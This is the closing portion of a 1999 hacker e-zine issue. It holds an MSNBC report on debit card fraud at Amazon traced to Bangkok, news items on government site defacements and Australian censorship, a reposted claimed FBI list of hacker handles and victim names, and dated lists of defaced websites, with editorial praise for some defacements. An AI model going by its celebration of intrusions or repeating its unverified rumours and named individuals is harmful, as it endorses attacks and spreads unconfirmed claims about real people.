        retailer of books and music to find out who was responsible.
        But Garlock was astonished to find that Amazon.com would
        not release any information to him about his account. 
               A customer of several years, Garlock had placed modest
        orders in the past, spending a total of $160, and had never
        had an unpleasant shopping experience at the online retailer's
        site. But Amazon.com would neither release the name of the
        individual who had purchased the goods using his debit card
        number nor tell Garlock what specific merchandise had been
        bought or where it had been shipped. 
               Amazon.com spokesman Paul Capelli said the company
        makes it a policy to release detailed information about an
        account only to a customer's bank, which can then release
        the details to their client. "We want to take reasonable steps
        to protect our customers' privacy," said Capelli. "We need to
        know we're dealing with the real customer, not someone
        calling on the phone who could be anyone." 
               As a result, the only information Garlock received
        directly was a hint accidentally leaked over the phone by a
        customer service representative. 
               "They let slip the first half of the e-mail address, and
        then they realized what they had done and put me on hold.
        They came back and read me a prepared response to the
        effect that they could not divulge any additional information to
        me," said Garlock.
               
        TRAIL TO THAILAND
               Frustrated, Garlock was determined to proceed with his
        own investigation. While his bank began an official inquiry
        into the case with Amazon.com, Garlock went to work. 
               Using the limited information he had obtained from
        Amazon.com, he uncovered a path of clues leading to a ring
        of alleged computer hackers in Bangkok, Thailand. The first
        part of the e-mail address given to him contained "an unusual
        word and turned out to be what is a very common first name
        in that part of the world," he said. 
                Garlock was able to uncover a wealth of personal
        information about the individuals who had used his card. With
        the help of ordinary search engines, he uncovered their home
        addresses, phone numbers and where they attended college.
        Garlock also found that in addition to having multiple e-mail
        addresses and Web sites touting their hacking skills, the
        alleged thieves held legitimate Web development jobs. 
               "We know a tremendous amount of personal,
        professional and business-type information on these people
        now from our investigations here in little old Bedford
        County," said Sheriff Michael Brown.
               Eventually Amazon.com released the shipping address
        and fraudulent e-mail address used by the credit card thieves
        to Garlock's bank, but by then the information only confirmed
        the data he had already uncovered. 
               Because the sheriff's office has no jurisdiction in
        Thailand, the department turned the case over to Interpol, the
        international crime investigation agency that works with
        federal law enforcement agencies and national police forces.
        Garlock's case is under review and, according to Brown, will
        most likely be turned over to the FBI, U.S. Customs or the
        Secret Service. 
               
        MORE CASES OF FRAUD 
         
               In an e-mail sent to Garlock, Amazon.com's
        investigations department confirmed that the charges made to
        his debit card were indeed "the result of unauthorized use."
               Mainstreet Bank Group said an investigations officer at
        Amazon.com admitted that the same group in Thailand had
        set up a number of other stolen credit card numbers for use
        at the retailer's site. 
               In a memo obtained by MSNBC, Shirley Schoefield, a
        bank investigations officer at Mainstreet Bank Group, said
        that "according to the investigations department at Amazon,
        approximately 20 cards have been set up for use to purchase
        merchandise to be sent to the following shipping address (in
        Thailand)." Citing customer privacy restrictions, Schoefield
        refused to comment on the case. 
               Amazon.com's Capelli also refused to comment on the
        case of the 20 fraudulent credit cards, but acknowledged that
        there have been instances of credit card misuse at the site.
        "From the time there has been credit cards, there has been
        credit card fraud. Bad things can happen any place, and the
        Internet is no different. Any retailer encounters this
        problem," he said.
               However, he insisted that Amazon.com's security
        system had never been compromised. Currently
        Amazon.com is advertising for positions in its fraud
        investigation department. Under the section "employment
        opportunities" on its Web site, Amazon.com is looking for a
        "fraud detection specialist" as well as a "fraud detection
        manager." 
               
        "DON'T USE A DEBIT CARD"
               Garlock's situation was made worse by the fact that his
        debit card number was stolen instead of a credit card. If his
        credit card had been used fraudulently, according to federal
        regulations, he could have easily stopped payment on the
        account and would have been held responsible for no more
        than $50. 
               But since his debit card was stolen, he temporarily lost
        everything in his checking account. When a debit card is
        used, the money is automatically removed from the account
        when the order is processed. While the bank is still
        responsible for paying Garlock back, he must wait until the
        official investigation is complete, a process that can take
        weeks and sometimes months. 
               "One of the biggest lessons I've learned from this is, for
        God's sake, don't use a debit card on the Internet," said
        Garlock. 
               Amazon.com has a policy of fully refunding unauthorized
        charges billed to a customer's account and has agreed to pay
        back Garlock any amount billed to his account that is not
        covered by his bank. 

                      
               
        HACKER AND/OR THIEF? 
               While it is clear that Garlock's debit card number was
        stolen and used illegally, what remains unknown is whether
        the thieves first obtained the number by breaking into
        Amazon.com's site, or whether the numbers were obtained
        from another source or even generated randomly. 
               Amazon.com's Capelli said that hackers have never
        broken into the company's site or stolen information on
        individual accounts.
               "Our system of storing credit card information has not
        been compromised, nor has it ever been compromised in any
        way. Any claims to this effect are not true - absolutely not
        true," said Capelli. 
               According to Inspector Earl Wismer of the San
        Francisco Police Department, which handles many cases of
        Internet fraud, "It's really difficult to pin down where exactly
        a credit card number was acquired. It is common for credit
        card numbers to be fraudulently used on the Web, but we're
        not able to determine whether the numbers were obtained
        from the Web or from some other source."
               In addition to stealing credit card numbers the
        old-fashioned way, such as acquiring the number from
        receipts, there are several sites on the Web where hackers,
        or anyone else who's interested, can generate legitimate
        credit card numbers based on algorithms, or mathematical
        formulas, used by banks. The algorithms generate all the
        numbers used by a given bank, but the hacker must then
        systematically try out each number in an effort to find one
        that is in current use and still has an available credit limit. 
               
        CROSS CHECKS NEEDED
               Garlock's case is worrisome because no matter how his
        debit card number was acquired, the user was still able to
        charge a hefty amount of merchandise to a debit card
        account owned by a person living in the Blue Ridge
        Mountains of Virginia and have it shipped to an address in
        Bangkok without any alarm bells going off at Amazon.com. 
               "Apparently their order confirmation system that would
        match a card number to a given individual is seriously
        flawed," said Garlock. 
               According to Capelli, the person who fraudulently used
        Garlock's debit card set up a separate account using the card
        number, but did not break into Garlock's existing account. 
               Capelli dismissed the need for a more thorough cross
        check of credit card numbers with existing account
        information adding that "it is very common to have more than
        one account per card number. For instance, there are
        husbands and wives with different names who have different
        accounts but use the same card number. Or parents who let
        their children use their credit card number to set up an
        account." 
               As Scambusters, an online consumer advocacy
        organization, points out, the reality is that it's actually much
        safer to enter a credit card number on a secure online order
        form than it is to give a credit card to a waiter at a
        restaurant. 
               But there are important security measures to be worked
        out before the process is 100 percent safe, despite what
        many online sites want customers to believe. 
                "There is definitely a problem and I think some
        people in the industry have known that it is a problem. It is
        not one that's going to be fixed easily," said Sheriff Brown.
        "Consumers have just got to be careful." 
      
      
      
      @HWA
      
      
 33.0 New Definition of 'Computer Hacker' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
             

      contributed by mortel 
      A woman in Grafton Ohio has redefined the term
      'computer hacker'. Twenty nine year old Kelli Michetti,
      upset that her husband was spending too much time
      online took a meat cleaver and attacked the home
      computer. She was fined $200 for her actions. 

      CBS News
      http://www.cbs.com/flat/story_164947.html
      
      @HWA
      
      
 34.0 Hackers In the Workplace 
      ~~~~~~~~~~~~~~~~~~~~~~~~     
      July 1st
     
      From HNN http://www.hackernews.com/      
      
      
      contributed by Whoever 
      Security companies claim that they do not hire hackers.
      In reality are they actually actively recruiting hackers?
      Are they doing this because they know that not only
      are they the most knowledgeable but also the most
      loyal and hard working? A new HNN exclusive Buffer
      Overflow article examines these questions and more. 

      Buffer Overflow 
      http://www.hackernews.com/orig/buffero.html
      
      @HWA
      
      
 35.0 NPR Covers .gov/.mil Defacements. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
      
      July 2nd
     
      From HNN http://www.hackernews.com/      
      

       contributed by oolong 
       In a rare moment of media impartiality, NPR's Morning
       Edition yesterday broadcast an article about the latest
       .gov breaking that featured an interview with Attrition
       staff. This interview properly puts the blame of the
       hacked pages on poor web server maintenance. This
       article is in Real Audio format. Kudos to Morning Edition
       for being fairly impartial, hopefully it will not be too
       much to ask other outlets to follow their example. 

       NPR - print
       http://www.npr.org/news/tech
       
       NPR - Real Audio       
       http://www.npr.org/ramfiles/me/19990630.me.03.ram
      
       " Hackers Strike Again Over the past month, there has been a
       rash of computer hacker attacks on government web sites including the
       White House, the FBI, and the Senate. Earlier this week they hit the Army's site
       and Wednesday the National Oceanic and Atmospheric Administration's
       Storm Prediction Center Web site was disabled. In some cases, the hackers
       were able to exploit computer systems that have not kept up to date with
       Internet security alerts. Hear more as NPR's John McChesney reports for Morning
       Edition. "
       
 36.0 Australia Passes Major Net Censorship Law
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
      July 2nd
     
      From HNN http://www.hackernews.com/       


      contributed by photon 
      Australian Parliament has created one of the world's
      most far-reaching online censorship laws. The
      Broadcasting Services Amendment Act will institute a
      rating system for Internet content. The Australian
      Broadcasting Authority will order ISPs to take down
      content on their servers rated X (Sexually Explicit) or RC
      (Refused Classification) within 24 hours of being
      notified. Opponents who failed to prevent the bill's
      passing hope that the decentralized nature of the
      internet will prove to be uncontrollable by this new law.
      One loophole in the law is already being exploited,
      regulators forgot to include anonymous proxy services in
      the legislation. 

      Wired
      http://www.wired.com/news/news/politics/story/20499.html
      
      MSNBC
      http://www.msnbc.com/news/285849.asp
      
      Broadcasting Services Amendment Act
      http://www.ozemail.com/~mbaker/amended.html
      
      Australian Broadcasting Authority      
      http://www.aba.gov.au/
      
      Wired;
      
      Australian Net Censor Law Passes
      by Stewart Taggart 

      8:15 a.m.  30.Jun.99.PDT
      CANBERRA, Australia -- The political leaders of this nation on Wednesday
      passed into law one of the world's most far-reaching online content censorship
      regimes. 

      The rules -- which take effect 1 January, 2000 -- enable Australian government
      regulators to order domestic Internet service providers (ISPs) to take down
      indecent or offensive Web sites housed on their servers, and also require they
      block access to certain domestic or overseas-based content. 


        "We're on fairly new ground here," said Stephen Nugent, special projects
      manager for the Australian Broadcasting Authority (ABA). "The codes of practice
      envisaged under this legislation are probably more detailed, and cover a
      greater range of matters, than I have seen in any other country." 

      Known as the "Broadcasting Services Amendment (Online Services) Act", the
      measure was approved by the House of Representatives late Wednesday night,
      according to a staffer in the office of Communications Minister Richard
      Alston. The measure had passed the more contentious Australian Senate on 26 May.

      The new law will institute a movie-like rating system for Internet content. The
      ABA will order ISPs to take down content on their servers rated X (Sexually Explicit)
      or RC (Refused Classification) within 24 hours of being notified. 

      For opponents of online content restrictions, the struggle will now shift to
      cyberspace itself. They believe the Internet simply will prove too large, too
      decentralized, and too fast-moving for regulators anywhere to successfully block
      access to any content for long. 

      Among the defiant is Perth-based online entrepreneur Bernadette Taylor. Known
      to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of
      herself and personalized email communication to paying members. 

      To Taylor, passage of the law merely begins a hide-and-seek game she
      professes little doubt she'll win. With a Web site housed in Dallas, Texas, she
      plans to stay one step ahead of the nation's blocking mechanisms for as long
      as the law lasts. 

      "With a bit of effort the ABA could find (and block) me every day but they'd have
      to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a
      mail list which has all the people that want notification of where I am." 

      She believes her Australian-based users will encounter little ongoing difficulty
      accessing her site, either through using encryption software or through proxy
      servers that disguise the source of material. 

      One such proxy server has been set up by South Australian Web site builder and
      e-commerce businessman Mike Russell. By visiting www.whois.com.au, Australian
      Web users will be able to access any site they want without disclosing where
      they're visiting. 

      Since banning proxy servers isn't included in the legislation, Russell says there will
      be little Australian regulators can do. 

      Among other defiant gestures, Russell is calling for a worldwide boycott by Web
      sites of visitors from "gov.au" domains -- recommending all such visitors be
      redirected by webmasters to the home page of Electronic Frontiers Australia, the
      online civil liberties group that spearheaded a failed effort to stop the
      law. 

      In introducing the online content legislation, the center-right government
      of Prime Minister John Howard argued that some controls are needed to limit
      access by children to pornographic content on the Internet, as well as other
      material that could be deemed offensive.

      Passage of the law comes amid research
      showing Internet use is rising rapidly in Australia. Figures released Wednesday by
      the Australian Bureau of Statistics showed nearly 18 percent of Australia's
      households now have some form of Internet access -- a rise of nearly 50
      percent in one year. Nearly 40 percent of Internet households in Australia now
      access the Internet on a daily basis, the researchers found. 

      To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of
      technology enthusiasts, the fact that the law comes into force on 1 January, 2000
      provides at least one indication that Australian lawmakers may not have been
      fully cognizant on all the issues involved. 

      "January 1 is not going to be one of the best days in the world to implement this,"
      he said, referring to the long-feared Year 2000 problem in which worldwide
      computers may start acting up due to the millennial date change. 

      "There are going to be much bigger problems around," he said. 
      
      @HWA
      
  
 37.0 Hacker Crackdown, is your nick on this list??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      From www.rewted.org
      
      FBI releases hacker list -- Saturday June 27 -- 11:00 sct 

      The FBI has started an all-out war on hackers and the like, they have received monetary funds from the
      government and are monitoring many servers, there is a possibility they are monitoring a few EFnet
      servers, but other than that agents go online posed as regular people. They also are monitoring DALnet
      and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in
      much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you
      provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000,
      and they are targeting many young people in groups. Their tactic with young people is to scare them with
      lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal
      prison?" So groups, watch your little ones. 
      check the list out below
      
      
      
             IRC Server: teen.vdi.net                Channel #crackdown
       ----------------------------------------------------------------------------
       
       AntiOnline Receives Directives
       Thursday, May 27, 1999 at 11:59:27
       by John Vranesevich - Founder of AntiOnline
       
       AntiOnline has received directives given to several ISPs listing the groups
       of hackers and hackgroups that they're currently targeting. Sources faxed
       AntiOnline the 6 page directive which begins:
       
       You are hereby requested to preserve, under provisions of Title 18, United
       States Code, Section 2703(a)(unopened e-mail), (b)(content),(c)(logs and
       records), and (f)the following records in your custody and control,
       including records stored on backup media:
       
       The request then goes on for 6 pages listing hackers, groups, and media
       currently under investigation by the FBI. The list contains not only the
       hacker's handles, but in most cases, their real names. For the privacy of
       those involved, AntiOnline is only publishing their aliases. Here is a
       partial list of the individuals on that list:
       
       Sate
       mz_chick
       epoh
       Anacarda
       kimmie
       badfrog
       Becky
       iCBM
       rox
       Code0
       Codex
       Sygma
       Cyberfire
       DigitalX
       Ibanez
       Spaceg0at
       Downfall
       Duk0r
       elf
       solarix
       VectorX
       f00t
       f0nz
       ganja
       Vie
       IO
       Cl0pz
       Bladex
       vallah
       jenna
       coolio
       hamster
       prym
       tr0n
       lure
       LD
       shortee
       LongDistance
       lothos
       blackhappy
       darkfaery
       crazygyrl
       Diesl0w
       blanc
       09
       Acidkill
       Phear
       nonlinea
       optic
       Overdose
       P0rt
       MostHated
       fryz
       hyrid
       ghost
       Rizzy
       prophet
       shdwknght
       sidney
       status
       taylor
       Texan
       Borgie
       d0lz
       timebomb
       Blakforge
       Type-0
       watchy
       wolf303
       wookie
       Yorph
       random
       totempole
       cyberf|re
       jos
       Mcintyre
       Eckis
       Twisted--
       Pantera
       angelo
       espionage
       fenderkev
       ne0h
       digital-
       ID-50
       taylor
       cult_hero
       socked
       problem
       mal_vu
       minos
       series
       ben-z
       rslink-
       judy
       
       
       The directive goes on to request information to:
       
       Directories, files, logs, records, information or any data concerning IRC
       Channels visited by Hackers or individuals listed in paragraph 1,
       specifically:
       
       It goes on to list the following IRC Channels:
       
       #creep
       #j00nix
       #tk
       #pascal
       #ex0dus
       #faggotsex
       #gayfagsex
       #gaysex
       #hackunix
       #hax0r
       #lezbiandsex
       #linux
       #sex_gay
       #sex_pl
       #shellx.log
       
       Section 5 of the directive requests:
       
       Directories, files, programs, logs, or data concerning the Names of hacker
       groups:
       
       This section goes on to list:
       
       GlobalHell
       gH
       milw0rm
       Total-ka0s
       tk
       Darkcyde
       D4rkcyde
       2600
       world domination
       enforcers
       enphorcers
       hackphreak
       
       Section 7 requests:
       
       Victim names or known victim identifying numbers, such as names, addresses,
       and telephone numbers, concerning the Individuals listed in paragraph 1, or
       listed below:
       
       Section 7 goes on to list:
       
       Meeting Place
       At&T
       Latitude
       Sprint
       MCI
       GTE
       Alltell
       Steve Huron
       Josh Teplow
       1-800-
       1-888-
       DCCCD
       LCET
       Walburg
       Dillon
       Reed
       3-com
       3com
       arizona.edu
       umich.edu
       uchicago.edu
       udel.edu
       uga.edu
       uwashington.edu
       
       
       As ALWAYS, AntiOnline will bring you the latest information as it becomes
       available.
       
       IRC Server: teen.vdi.net                Channel #crackdown
       ----------------------------------------------------------------------------
       
       FBI lurking on IRC
       May, 30 1999 - 22:07
       contributed by: BinaryZer0
       From an unidentified source, I, and others, have been told to keep quiet on
       IRC's EFnet, especially the lagged.org servers. Why? It is possible that the
       FBI received cooperation from lagged.org officials, and the FBI is now
       sniffing the server. It is possible that they are sniffing out words like
       "hack" with a similar type of contraction as "grep". This is due to the
       recent hacks of government sites, and the involvement of gH members (who
       hang out on EFnet).
       
       Further details will, somehow, be investigated.
       
       IRC Server: teen.vdi.net                Channel #crackdown
       ----------------------------------------------------------------------------
       
       As I have been told, a few people were raided a few weeks back:
               Becky-
               fryz
               MostHated
       
       Nothing really has been pinned on them.
       
       More can be discussed on the IRC server, teen.vdi.net, port 6667
       in channel #crackdown.
       
       -missnglnk
 
      @HWA
      
      -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-  

		          T     E    R    M   U       M     L
		             H          U   O   R        I     L
      
      -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-  
      
 Rumours:
 ~~~~~~~
     
      Send rumours to hwa@press.usmc.net, or join our irc channel and gossip!! tnx ..
      
    + www.403-security.org has had a facelift, check out the new look and leave your comments to
      astral on how you like it...      
       
    + Help! net-security is changing servers and may be down for a few days while they overcome
      some new server teething problems (probably dns related). See elsewhere this issue for more
      details ... 
      
    + HNN: contributed by Space Rogue, HNN hopes everyone has a fun filled Fourth of July weekend. 
      Note, that there will be no news update on Monday. Be sure to check in next week as we 
      attempt to update the site remotely from Defcon7 in Las Vegas. 
      
      We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday. 

      Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a
      few bugs. (with all the news lately we forgot to mention it). Be sure to join up with the HNN 
      team as you search for that Aranakin guy. 

      HNN Team for SETI@Home  
      http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?cmd=team_lookup&name=The+Hacker+News+Network
      
     
         
 AD.S ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
       
       
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       
       
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *             One of our sponsors, visit them now: www.csoft.net              *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! .............    
      
      
      From www.innerpulse.com ...
      
      JP offers a public personal insite to his family

      Contributed by mkatona
      Tuesday - March 02, 1999. 05:09PM UTC 

          In an off the wall media report, AntiOnline's owner, JP, reveals personal
      information to the world:

      "It's no secret my Father was a famous actor. And instead of letting the
      rumor mill swallow this down, I would rather tell it like it is.. Yes my
      father was Beaver Cleaver." 

      Immediately after, JP played a Leave it To Beaver midi theme, put on a small
      baseball hat and walked out. When reached by phone JP has this to say, 

      "Yes, AntiOnline is a hackers security site. But so what if my dad was
      Beaver Cleaver. I still have to stop hackers. And please cease with the
      Little Beaver emails. It's annoying and pointless. One of the reasons
      AntiOnline is so successful is because my dad told me to get revenge on
      the world for canceling his show. And that Beaver Cleaver dis-placed
      anger still lingers in me. So you can do anything you want to.. But
      remember, I have Beaver power!" 

      It's not sure if Wally and the rest of the whole gang are open to questions.
      Last seen, Wourd Cleaver was still on AOL perfecting his scrolling skills.
      The FBI has also opened a case against suspected Granny Hacker from
      heck Carolyn Meinel on the grounds of dressing/looking like a crack friend
      and the possibility she is Wally's long lost best friend, Eddy Haskel. 

      [Reporting for innerpulse.com, Innerpulse News, this is Matthew Katona
      from polyester.net signing off.] 

      AntiOnline 
      http://www.antionline.com/
      
            
      @HWA
       
       
       
 SITE.1 AntiOffline
        ~~~~~~~~~~~
        
        http://www.antioffline.com/ is a parody of AntiOnline which has been around 
        for some time now, check it out if you haven't already. 
        
        http://www.antioffline.com/

      
      
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while; for those following their saga, visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
     
     
     From HNN rumours section http://www.hackernews.com/
     see the archives section on HNN or attrition.org for copies of many of these
     sites in their defaced form.
     
     http://www.attrition.org/
     
     
     June 28th
     
       contributed by Anonymous 
       Cracked
       A busy weekend for some. Take a look at all the .gov
       sites.
       http://alumni.byu.edu
       http://www.campaign.co.uk 
       http://nauvoo.byu.edu 
       http://www.wallawalla.com 
       http://www.abscond.com 
       http://www-nmlc.med.navy.mil 
       http://www.ed.gov 
       http://www.casper-homes.com 
       http://www.deepknowledge.com 
       http://www.teweb.com 
       http://faithtabernacle.com 
       http://www.prulite.com 
       http://www.mt.gov.br 
       http://www.sc.gov.br 
       http://theserialkillers.cjb.net 
       http://fns1.usda.gov 
       http://www.fhpr8.fs.usda.gov 
       http://www.fsis.usda.gov 
       http://www.rurdev.usda.gov 
       http://www.happyhack.com 
       http://www.nacc.nasa.gov 
       http://www.forpc.com.au 
       http://www.cnic.net 
       http://www.bell-microsystems.com 
       http://www.flyfishboats.com 
       http://www.flyfishboats.com 
       http://www.heritagebank.com 
       http://www.petstore.com 
       http://microgravity.nasa.gov 
       http://www.forpc.com.au 
       http://www.kwikweb.com
     
     June 29th
     
       Contributed by Anonymous 
       Cracked
       The following sites have been reported as cracked.
       http://www.topaccess.com.br 
       http://www.nic.bo 
       http://ntciasc05.ciasc.gov.br 
       http://dbserv.ils.unc.edu 
       http://www.humnet.ucla.edu 
       http://www.cyberpimp.com 
       http://www.crossinit.org 
       http://www.coldflame.org 
       http://www.christfamilychurch.org 
       http://www.avcdirect.com 
       http://www.canyonriver.com 
       http://www.cinewave.com 
       http://www.computersworth.com 
       http://www.ctektx.com 
       http://www.cybertech2000.com 
       http://www.dfw-nt.com 
       http://www.graceandgrace.com 
       http://www.graytech.com 
       http://www.meusa.com 
       http://www.mjdistribution.com 
       http://www.webdallas.com 
       http://www.softwarewholeseller.com 
       http://www.shamrock-bolt.com 
       http://www.number14.com
       
      June 30th
      
       contributed by Anonymous 
       Cracked
       The following sites have been reported as compromised.
       http://www.georgeabbot.surrey.sch.uk
       http://chef.fab.albany.edu 
       http://altpro.pdp.albany.edu 
       http://caster.gsfc.nasa.gov 
       http://www.umkc-efkc.org 
       http://www.spc.noaa.gov  
       
      July 1st
      
      Keebler Elves Strike Yet Another Government Server


      contributed by Code Kid 
      Upset by the actions of John Vranesevich of AntiOnline
      and Harvard University's overreaction, the Keebler Elves
      have attacked another government web site. This time
      they have posted very derogatory comments about
      John Vranesevich on the web site of the Bureau of
      Reclamation, Rio Grande Operations.

      HNN Cracked Pages Archive 
      http://www.hackernews.com/archive/crackarch.html
      
      
      July 2nd
      
      contributed by Anonymous 
       Cracked
       The following sites have been reported as
       compromised over the last two days.
       http://www.cedom.gov.ar
       http://www.evolucao.com.br 
       http://www.colonnades.com.au 
       http://www.fit.org.au 
       http://www.tcfua.org.au 
       http://www.advancecleaning.com 
       http://www.beyond-software.com 
       http://www.heartlandcard.com 
       http://www.superwarez.com 
       http://www.maris.int - possible first crack of .int domain
       http://www.whiterules.com 
       http://www.uc.usbr.gov 
       http://www.aao.uc.usbr.gov 
       http://www.hoxie.org 
       http://www.rbvend.com 
       http://www.entelnet.bo 
       http://www.2600.co.uk 
       http://www.atr.org 
       http://www.frontweb.com 
       http://resource-central.com 
       http://www.voris.com 
       http://www.cosmeticscounter.com 
       http://www.fragrancecounter.com 
       http://www.stickz.com  

-------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html

      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      HWA.hax0r.news Mirror Sites:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://packetstorm.genocide2600.com/hwahaxornews/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm


      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/

      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net

      Canada .......: http://www.hackcanada.com

      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net

      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/

      Netherlands...: http://security.pine.nl/

      Russia........: http://www.tsu.ru/~eugene/

      Singapore.....: http://www.icepoint.com

      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

    Got a link for this section? Email it to hwa@press.usmc.net and I'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]